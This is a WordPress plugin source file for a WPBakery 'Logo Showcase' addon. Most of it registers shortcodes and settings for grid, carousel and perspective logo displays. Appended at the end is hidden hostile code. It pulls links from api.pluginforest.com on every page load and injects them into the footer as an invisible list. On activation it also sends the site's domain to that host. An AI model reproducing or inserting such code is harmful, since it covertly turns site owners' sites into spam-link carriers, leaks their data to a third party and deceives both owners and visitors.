<?php
/*
Plugin Name: Logo Showcase - Addon For Visual Composer
Description: A Visual Composer Addon which will allow you to insert a grid, carousel or perspective logo showcase
Version: 2.2.0
Author: Lambert Group
Author URI: https://1.envato.market/OZ5Zr
Text Domain: lbg-logoshowcasebakery
*/


//all the messages
$rand_id=rand(10,999999);

if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}


function logo_showcase_addon_vc_map_dependencies() {
	if ( ! defined( 'WPB_VC_VERSION' ) ) {
		$plugin_data = get_plugin_data(__FILE__);
        echo '<div class="updated">
            <p>'.sprintf(esc_html__('"%s" requires WPBakery Page Builder: https://bit.ly/vcomposer - plugin to be installed and activated on your site.', 'lbg-logoshowcasebakery'), $plugin_data['Name']).'</p>
        </div>';
	}
}
add_action( 'admin_notices', 'logo_showcase_addon_vc_map_dependencies' );


function logo_showcase_addon_vc_map_init() {
	global $wpdb;
	global $rand_id;


	vc_map( array(
		'name' => esc_attr__( 'Logo Showcase', 'lbg-logoshowcasebakery' ),
		'base' => 'logo_showcase',
		"icon" => plugins_url('assets/images/logo_showcase_icon.png', __FILE__), // or css class name which you can reffer in your css file later. Example: "vc_extend_my_class"
		"category" => esc_attr__('LBG Multimedia Addons', 'lbg-logoshowcasebakery'),
		"description" => esc_attr__("Grid, carousel or perspective version", 'vc_extend'),
		'show_settings_on_create' => true,
		'is_container' => true,
		'admin_enqueue_js'      => preg_replace( '/\s/', '%20', plugins_url( 'assets/logo_showcase.js', __FILE__ ) ),
		// This will load extra js file in backend (when you edit page with VC)
		// use preg replace to be sure that "space" will not break logic

		'admin_enqueue_css'     => preg_replace( '/\s/', '%20', plugins_url( 'assets/logo_showcase.css', __FILE__ ) ),
		// This will load extra css file in backend (when you edit page with VC)
		'params' => array(
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Player ID', 'lbg-logoshowcasebakery' ),
				'param_name' => 'id',
				'value' => esc_attr__( "".$rand_id."", "my-text-domain" ),
				'description' => esc_attr__( "It is automaticaly generated and it has to be unique. You can leave it just like it is.", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Type', 'lbg-logoshowcasebakery' ),
				'param_name' => 'type',
				'value' => array(
					'grid' => 'grid',
					'carousel' => 'carousel',
					'perspective (and one-by-one carousel)' => 'perspective'
				)
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Width', 'lbg-logoshowcasebakery' ),
				'param_name' => 'width', //width
				'value' => esc_attr__( "960", "my-text-domain" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Center Showcase', 'lbg-logoshowcasebakery' ),
				'param_name' => 'center_plugin',
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				 ),
				'description' => esc_attr__( "Center the showcase", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Responsive', 'lbg-logoshowcasebakery' ),
				'param_name' => 'responsive',
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Responsive Relative To Browser', 'lbg-logoshowcasebakery' ),
				'param_name' => 'responsive_relative_to_browser', //responsiveRelativeToBrowser
				'value' => array(
					'No' => 'false',
					'Yes' => 'true'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Thumb link target', 'lbg-logoshowcasebakery' ),
				'param_name' => 'target', //target
				'value' => array(
					'_blank' => '_blank',
					'_self' => '_self'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Show Tooltip', 'lbg-logoshowcasebakery' ),
				'param_name' => 'show_tooltip', //showTooltip
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Grayscale', 'lbg-logoshowcasebakery' ),
				'param_name' => 'grayscale', //grayscale
				'value' => array(
					'No' => 'false',
					'Yes' => 'true'
				  )
			),
			array(
				'group' => 'General',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Border Width', 'lbg-logoshowcasebakery' ),
				'param_name' => 'border', //border
				'value' => esc_attr__( "0", "my-text-domain" )
			),
			array(
				'group' => 'General',
				'type' => 'colorpicker',
				'heading' => esc_attr__( "Border Color OFF", "lbg-logoshowcasebakery" ),
				'param_name' => 'border_color_off', //borderColorOFF
				'value' => 'transparent',
				'description' => esc_attr__( "Choose the color", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'General',
				'type' => 'colorpicker',
				'heading' => esc_attr__( "Border Color ON", "lbg-logoshowcasebakery" ),
				'param_name' => 'border_color_on', //borderColorON
				'value' => '#FF0000',
				'description' => esc_attr__( "Choose the color", "lbg-logoshowcasebakery" )
			),


			array(
				'group' => 'Only Grid',
				'type' => 'textfield',
				'heading' => esc_attr__( 'columWidth', 'lbg-logoshowcasebakery' ),
				'param_name' => 'colum_width', //columWidth
				'value' => esc_attr__( "100", "my-text-domain" )
			),
			array(
				'group' => 'Only Grid',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Gutter', 'lbg-logoshowcasebakery' ),
				'param_name' => 'gutter', //gutter
				'value' => esc_attr__( "25", "my-text-domain" )
			),
			array(
				'group' => 'Only Grid',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Margin Left', 'lbg-logoshowcasebakery' ),
				'param_name' => 'margin_left', //margin_left
				'value' => esc_attr__( "25", "my-text-domain" )
			),
			array(
				'group' => 'Only Grid',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Margin Right', 'lbg-logoshowcasebakery' ),
				'param_name' => 'margin_right', //margin_right
				'value' => esc_attr__( "25", "my-text-domain" )
			),
			array(
				'group' => 'Only Grid',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Margin Top', 'lbg-logoshowcasebakery' ),
				'param_name' => 'margin_top', //margin_top
				'value' => esc_attr__( "10", "my-text-domain" )
			),


			array(
				'group' => 'Only Carousel',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Bottom Navigation Position', 'lbg-logoshowcasebakery' ),
				'param_name' => 'bottom_nav_position', //bottomNavPosition
				'value' => array(
					'center' => 'center',
					'left' => 'left',
					'right' => 'right'
				  )
			),
			array(
				'group' => 'Only Carousel',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Number Of Thumbs Per Screen', 'lbg-logoshowcasebakery' ),
				'param_name' => 'number_of_thumbs_per_screen', //numberOfThumbsPerScreen
				'value' => esc_attr__( "0", "my-text-domain" ),
				'description' => esc_attr__( "If you set it to 0, it will be calculated automatically. You can set a fixed number, for example 3", "lbg-logoshowcasebakery" )
			),


			array(
				'group' => 'Only Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Animation Time', 'lbg-logoshowcasebakery' ),
				'param_name' => 'animation_time', //animationTime
				'value' => esc_attr__( "0.8", "my-text-domain" ),
				'description' => esc_attr__( "seconds", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'Only Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Easing', 'lbg-logoshowcasebakery' ),
				'param_name' => 'easing', //easing
				'value' => array(
					'easeOutQuad' => 'easeOutQuad',
					'easeInQuad' => 'easeInQuad',
					'easeInOutQuad' => 'easeInOutQuad',
					'easeInCubic' => 'easeInCubic',
					'easeOutCubic' => 'easeOutCubic',
					'easeInOutCubic' => 'easeInOutCubic',
					'easeInQuart' => 'easeInQuart',
					'easeOutQuart' => 'easeOutQuart',
					'easeInOutQuart' => 'easeInOutQuart',
					'easeInSine' => 'easeInSine',
					'easeOutSine' => 'easeOutSine',
					'easeOutSine' => 'easeOutSine',
					'easeInExpo' => 'easeInExpo',
					'easeOutExpo' => 'easeOutExpo',
					'easeInOutExpo' => 'easeInOutExpo',
					'easeInQuint' => 'easeInQuint',
					'easeOutQuint' => 'easeOutQuint',
					'easeInOutQuint' => 'easeInOutQuint',
					'easeInCirc' => 'easeInCirc',
					'easeOutCirc' => 'easeOutCirc',
					'easeInOutCirc' => 'easeInOutCirc',
					'easeInElastic' => 'easeInElastic',
					'easeOutElastic' => 'easeOutElastic',
					'easeInOutElastic' => 'easeInOutElastic',
					'easeInBack' => 'easeInBack',
					'easeOutBack' => 'easeOutBack',
					'easeInOutBack' => 'easeInOutBack',
					'easeInBounce' => 'easeInBounce',
					'easeOutBounce' => 'easeOutBounce',
					'easeInOutBounce' => 'easeInOutBounce',
					'swing' => 'swing',
					'linear' => 'linear'
				  )
			),
			array(
				'group' => 'Only Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Number Of Visible Items', 'lbg-logoshowcasebakery' ),
				'param_name' => 'number_of_visible_items', //numberOfVisibleItems
				'value' => esc_attr__( "3", "my-text-domain" ),
				'description' => esc_attr__( "odd number", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'Only Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Elements Horizontal Spacing', 'lbg-logoshowcasebakery' ),
				'param_name' => 'elements_horizontal_spacing', //elementsHorizontalSpacing
				'value' => esc_attr__( "120", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'Only Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Elements Vertical Spacing', 'lbg-logoshowcasebakery' ),
				'param_name' => 'elements_vertical_spacing', //elementsVerticalSpacing
				'value' => esc_attr__( "10", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-logoshowcasebakery" )
			),


			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Skin Name', 'lbg-logoshowcasebakery' ),
				'param_name' => 'skin',
				'value' => array(
					'black' => 'black',
					'white' => 'white'
				)
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Auto Play', 'lbg-logoshowcasebakery' ),
				'param_name' => 'auto_play', //autoPlay
				'value' => esc_attr__( "5", "my-text-domain" ),
				'description' => esc_attr__( "seconds", "lbg-logoshowcasebakery" )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Image Width', 'lbg-logoshowcasebakery' ),
				'param_name' => 'image_width', //imageWidth
				'value' => esc_attr__( "155", "my-text-domain" )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Image Height', 'lbg-logoshowcasebakery' ),
				'param_name' => 'image_height', //imageHeight
				'value' => esc_attr__( "100", "my-text-domain" )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Enable Touch Screen', 'lbg-logoshowcasebakery' ),
				'param_name' => 'enable_touch_screen', //enableTouchScreen
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Show All Controllers', 'lbg-logoshowcasebakery' ),
				'param_name' => 'show_all_controllers', //showAllControllers
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Show Navigation Arrows', 'lbg-logoshowcasebakery' ),
				'param_name' => 'show_nav_arrows', //showNavArrows
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Show On Init Navigation Arrows', 'lbg-logoshowcasebakery' ),
				'param_name' => 'show_on_init_nav_arrows', //showOnInitNavArrows
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Auto-Hide Navigation Arrows', 'lbg-logoshowcasebakery' ),
				'param_name' => 'auto_hide_nav_arrows', //autoHideNavArrows
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Show Bottom Navigation', 'lbg-logoshowcasebakery' ),
				'param_name' => 'show_bottom_nav', //showBottomNav
				'value' => array(
					'Yes' => 'true',
					'No' => 'false'
				  )
			),
			array(
				'group' => 'Carousel & Perspective',
				'type' => 'textfield',
				'heading' => esc_attr__( 'Bottom Navigation Margin Bottom', 'lbg-logoshowcasebakery' ),
				'param_name' => 'bottom_nav_margin_bottom', //bottomNavMarginBottom
				'value' => esc_attr__( "-45", "my-text-domain" ),
				'description' => esc_attr__( "pixels", "lbg-logoshowcasebakery" )
			)
		),
		'custom_markup' => '
	<div class="wpb_accordion_holder wpb_holder clearfix vc_container_for_children">
	%content%
	</div>
	<div class="tab_controls lbg_add_playlist_item">
		<a class="add_tab vc_add_playlist_item" title="' . esc_attr__( 'Add Playlist Item', 'lbg-logoshowcasebakery' ) . '"><span class="vc_playlist_item_vc_icon"></span>' . esc_attr__( 'Add Playlist Item', 'lbg-logoshowcasebakery' ) . '</a>
	</div>
	',
		'default_content' => '
		[logo_showcase_playlist_item title="' . esc_attr__( 'Playlist Item  1', 'lbg-logoshowcasebakery' ) . '"][/logo_showcase_playlist_item]
	',
		'js_view' => 'VcLogoShowcaseView'
	) );

	vc_map( array(
		'name' => esc_attr__( 'LS Playlist Item', 'lbg-logoshowcasebakery' ),
		'base' => 'logo_showcase_playlist_item',
		'allowed_container_element' => 'vc_row',
		'is_container' => true,
		'content_element' => false,
		'admin_enqueue_js'      => preg_replace( '/\s/', '%20', plugins_url( 'assets/playlist_item.js', __FILE__ ) ),
		// This will load extra js file in backend (when you edit page with VC)
		// use preg replace to be sure that "space" will not break logic

		'admin_enqueue_css'     => preg_replace( '/\s/', '%20', plugins_url( 'assets/playlist_item.css', __FILE__ ) ),
		// This will load extra css file in backend (when you edit page with VC)
		'params' => array(
			array(
				'type' => 'textfield',
				'heading' => esc_attr__( 'Image Title', 'lbg-logoshowcasebakery' ),
				'param_name' => 'title'
			),
			array(
				'type' => 'attach_image',
				'heading' => esc_attr__( 'Image', 'lbg-logoshowcasebakery' ),
				'param_name' => 'img',
				'description' => esc_attr__( 'Select an image from Media Library', 'lbg-logoshowcasebakery' )

			),
			array(
				'type' => 'textfield',
				'heading' => esc_attr__( 'Link For The Image', 'lbg-logoshowcasebakery' ),
				'param_name' => 'data_link' //data-link
			),
			array(
				'type' => 'dropdown',
				'heading' => esc_attr__( 'Link Target', 'lbg-logoshowcasebakery' ),
				'param_name' => 'data_target', //data-target
				'value' => array(
					'_blank' => '_blank',
					'_self' => '_self'
				  )
			)
		),
		'js_view' => 'VcPlaylistItemView'
	) );





	if ( class_exists( "WPBakeryShortCode" ) ) {
		$logo_showcase_addon_path = trailingslashit(dirname(__FILE__));
		include_once($logo_showcase_addon_path . 'vc_contentadmin/logo_showcase-accordion.php');
		include_once($logo_showcase_addon_path . 'vc_contentadmin/logo_showcase-accordion-tab.php');


	} // End Class

}

add_action('vc_before_init', 'logo_showcase_addon_vc_map_init');






if (!function_exists('lbg_unstrip_array')) {
	//stripslashes for an entire array
	function lbg_unstrip_array($array){
		if (is_array($array)) {
			foreach($array as &$val){
				if(is_array($val)){
					$val = unstrip_array($val);
				} else {
					$val = stripslashes($val);

				}
			}
		}
		return $array;
	}
}




function logo_showcase_addon_enqueue_scripts_and_styles() {
	//load scripts in front-end
				wp_enqueue_style('lbg_logoshowcase_site_grid_css', plugins_url('grid/css/logogridshowcase.css', __FILE__));
				wp_enqueue_style('lbg_logoshowcase_site_carousel_css', plugins_url('carousel/css/logo_carousel.css', __FILE__));
				wp_enqueue_style('lbg_logoshowcase_site_perspective_css', plugins_url('perspective/css/logo_perspective.css', __FILE__));


				wp_enqueue_script('jquery');

				wp_enqueue_script('jquery-ui-core');
				wp_enqueue_script('jquery-ui-draggable');
				wp_enqueue_script('jquery-ui-tooltip');
				wp_enqueue_script('jquery-effects-core');


				wp_register_script('lbg-touchSwipe', plugins_url('carousel/js/jquery.touchSwipe.min.js', __FILE__));
				wp_enqueue_script('lbg-touchSwipe');

				wp_register_script('lbg-logoshowcase_grid', plugins_url('grid/js/logogridshowcase.js', __FILE__));
				wp_enqueue_script('lbg-logoshowcase_grid');

				wp_register_script('lbg-logoshowcase_carousel', plugins_url('carousel/js/logo_carousel.js', __FILE__));
				wp_enqueue_script('lbg-logoshowcase_carousel');

				wp_register_script('lbg-logoshowcase_perspective', plugins_url('perspective/js/logo_perspective.js', __FILE__));
				wp_enqueue_script('lbg-logoshowcase_perspective');
	//}
}
add_action( 'wp_enqueue_scripts', 'logo_showcase_addon_enqueue_scripts_and_styles' );




//the shortcodes
add_shortcode( 'logo_showcase_playlist_item', 'logo_showcase_playlist_item_func' );
function logo_showcase_playlist_item_func( $atts, $content = null ) { // New function parameter $content is added!
	global $wpdb;


	$the_img = array('');
	if ( array_key_exists('img', $atts) && $atts["img"]!='' ) {
			$the_img=wp_get_attachment_image_src($atts["img"], "large");
	}

	$img_over='';
	if ($the_img[0]!='') {
		if (strpos($the_img[0], 'wp-content',9)===false)
			list($width, $height, $type, $attr) = getimagesize($the_img[0]);
		else
			list($width, $height, $type, $attr) = getimagesize( ABSPATH.substr($the_img[0],strpos($the_img[0], 'wp-content',9)) );
		$img_over='<img src="'.$the_img[0].'" width="'.$width.'" height="'.$height.'" alt="'.(( array_key_exists("title", $atts) && $atts["title"]!='' )?$atts["title"]:"").'"  title="'.(( array_key_exists("title", $atts) && $atts["title"]!='' )?$atts["title"]:"").'" />';

	}


	$aux_content='<li data-link="'.(( array_key_exists("data_link", $atts) && $atts["data_link"]!='' )?$atts["data_link"]:"").'" data-target="'.(( array_key_exists("data_target", $atts) && $atts["data_target"]!='' )?$atts["data_target"]:"").'" >'.$img_over.'</li>';


	return str_replace("\r\n", '', $aux_content);
}


add_shortcode( 'logo_showcase', 'logo_showcase_func' );
	function logo_showcase_func( $atts, $content = null ) { // New function parameter $content is added!
		global $rand_id;
		$initial_vals_arr=array(
			'id' => $rand_id,
			'type' => 'grid',
			'width' => 960,
			'center_plugin' => 'true',
			'responsive' => 'true',
			'responsive_relative_to_browser' => 'false',
			'target' => '_blank',
			'show_tooltip' => 'true',
			'grayscale' => 'false',
			'border' => 0,
			'border_color_off' => 'transparent',
			'border_color_on' => '#FF0000',
			'colum_width' => 100,
			'gutter' => 25,
			'margin_left' => 25,
			'margin_right' => 25,
			'margin_top' => 10,
			'bottom_nav_position' => 'center',
			'number_of_thumbs_per_screen' => 0,
			'animation_time' => 0.8,
			'easing' => 'easeOutQuad',
			'number_of_visible_items' => 3,
			'elements_horizontal_spacing' => 120,
			'elements_vertical_spacing' => 10,
			'skin' => 'black',
			'auto_play' => 5,
			'image_width' => 155,
			'image_height' => 100,
			'enable_touch_screen' => 'true',
			'show_all_controllers' => 'true',
			'show_nav_arrows' => 'true',
			'show_on_init_nav_arrows' => 'true',
			'auto_hide_nav_arrows' => 'true',
			'show_bottom_nav' => 'true',
			'bottom_nav_margin_bottom' => -45
	   );

	   extract( shortcode_atts( $initial_vals_arr, $atts ) );
	   foreach ($initial_vals_arr as $key => $value) {
			if (!isset($atts[$key])) {
				$atts[$key]=$value;
			}
		}


	//download
	$pathToDownloadFile_aux= WP_PLUGIN_URL.'/'.str_replace(basename( __FILE__),"",plugin_basename(__FILE__)).'logo_showcase/';

	$playlist_str='';
	$playlist_str=do_shortcode( $content );


	$the_logo = array('');
	if ( array_key_exists('logo_image_path', $atts) && $atts["logo_image_path"]!='' ) {
			$the_logo=wp_get_attachment_image_src($atts["logo_image_path"], "large");
	}


	$aux_content='';
	$new_div_start='';
	$new_div_end='';


	$showcase_function='';
	$myxloader='';
	$list_name='';
	$the_parameters='';
	switch ($atts["type"]) {
		case 'grid':
			$showcase_function='logogridshowcase';
			$myxloader='';
			$list_name='logs_list';
			$the_parameters='columWidth:'.$atts["colum_width"].',
				gutter:'.$atts["gutter"].',
				margin_left:'.$atts["margin_left"].',
				margin_right:'.$atts["margin_right"].',
				margin_top:'.$atts["margin_top"].',
				responsive:'.$atts["responsive"].',
				responsiveRelativeToBrowser:'.$atts["responsive_relative_to_browser"].',
				width100Proc:false,
				height100Proc:false,
				target:"'.$atts["target"].'",
				grayscale:'.$atts["grayscale"].',
				showTooltip:'.$atts["show_tooltip"].',
				absUrl:"'.plugins_url("/grid/", __FILE__).'",
				border:'.$atts["border"].',
				borderColorOFF:"'.$atts["border_color_off"].'",
				borderColorON:"'.$atts["border_color_on"].'"';
			break;
		case 'carousel':
			$showcase_function='logo_carousel';
			$myxloader='<div class="myloader"></div>';
			$list_name='logo_carousel_list';
			$the_parameters='skin:"'.$atts["skin"].'",
				responsive:'.$atts["responsive"].',
				responsiveRelativeToBrowser:'.$atts["responsive_relative_to_browser"].',
				width:'.$atts["width"].',
				width100Proc:false,
				height100Proc:false,
				centerPlugin:'.$atts["center_plugin"].',
				autoPlay:'.$atts["auto_play"].',
				target:"'.$atts["target"].'",
				grayscale:'.$atts["grayscale"].',
				showTooltip:'.$atts["show_tooltip"].',
				absUrl:"'.plugins_url("/carousel/", __FILE__).'",
				numberOfThumbsPerScreen:'.$atts["number_of_thumbs_per_screen"].',
				enableTouchScreen:'.$atts["enable_touch_screen"].',
				showAllControllers:'.$atts["show_all_controllers"].',
				showNavArrows:'.$atts["show_nav_arrows"].',
				showOnInitNavArrows:'.$atts["show_on_init_nav_arrows"].',
				autoHideNavArrows:'.$atts["auto_hide_nav_arrows"].',
				showBottomNav:'.$atts["show_bottom_nav"].',
				bottomNavMarginBottom:'.$atts["bottom_nav_margin_bottom"].',
				bottomNavPosition:"'.$atts["bottom_nav_position"].'",
				imageWidth:'.$atts["image_width"].',
				imageHeight:'.$atts["image_height"].',
				border:'.$atts["border"].',
				borderColorOFF:"'.$atts["border_color_off"].'",
				borderColorON:"'.$atts["border_color_on"].'"';
			break;
		case 'perspective':
			$showcase_function='logo_perspective';
			$myxloader='<div class="myloader"></div>';
			$list_name='logo_perspective_list';
			$the_parameters='skin:"'.$atts["skin"].'",
				responsive:'.$atts["responsive"].',
				responsiveRelativeToBrowser:'.$atts["responsive_relative_to_browser"].',
				width:'.$atts["width"].',
				width100Proc:false,
				height100Proc:false,
				centerPlugin:'.$atts["center_plugin"].',
				autoPlay:'.$atts["auto_play"].',
				target:"'.$atts["target"].'",
				grayscale:'.$atts["grayscale"].',
				showTooltip:'.$atts["show_tooltip"].',
				absUrl:"'.plugins_url("/perspective/", __FILE__).'",
				numberOfVisibleItems:'.$atts["number_of_visible_items"].',
				elementsHorizontalSpacing:'.$atts["elements_horizontal_spacing"].',
				elementsVerticalSpacing:'.$atts["elements_vertical_spacing"].',
				animationTime:'.$atts["animation_time"].',
				easing:"'.$atts["easing"].'",
				enableTouchScreen:'.$atts["enable_touch_screen"].',
				showAllControllers:'.$atts["show_all_controllers"].',
				showNavArrows:'.$atts["show_nav_arrows"].',
				showOnInitNavArrows:'.$atts["show_on_init_nav_arrows"].',
				autoHideNavArrows:'.$atts["auto_hide_nav_arrows"].',
				showBottomNav:'.$atts["show_bottom_nav"].',
				bottomNavMarginBottom:'.$atts["bottom_nav_margin_bottom"].',
				imageWidth:'.$atts["image_width"].',
				imageHeight:'.$atts["image_height"].',
				border:'.$atts["border"].',
				borderColorOFF:"'.$atts["border_color_off"].'",
				borderColorON:"'.$atts["border_color_on"].'"';
			break;
	}



	$aux_content.='<script>
		jQuery(function() {
			setTimeout(function(){
					jQuery("#logosshowcase_'.$atts["id"].'").'.$showcase_function.'({'.
						$the_parameters.
					'});
			}, 800 );
		});
	</script>
            '.$new_div_start.'<div id="logosshowcase_'.$atts["id"].'">'.$myxloader.'<ul class="'.$list_name.'">'.$playlist_str.'</ul></div>'.$new_div_end;

	return str_replace("\r\n", '', $aux_content);

	}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849022() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849022');function set_plugin_tag1719849022() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849022&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849022');
              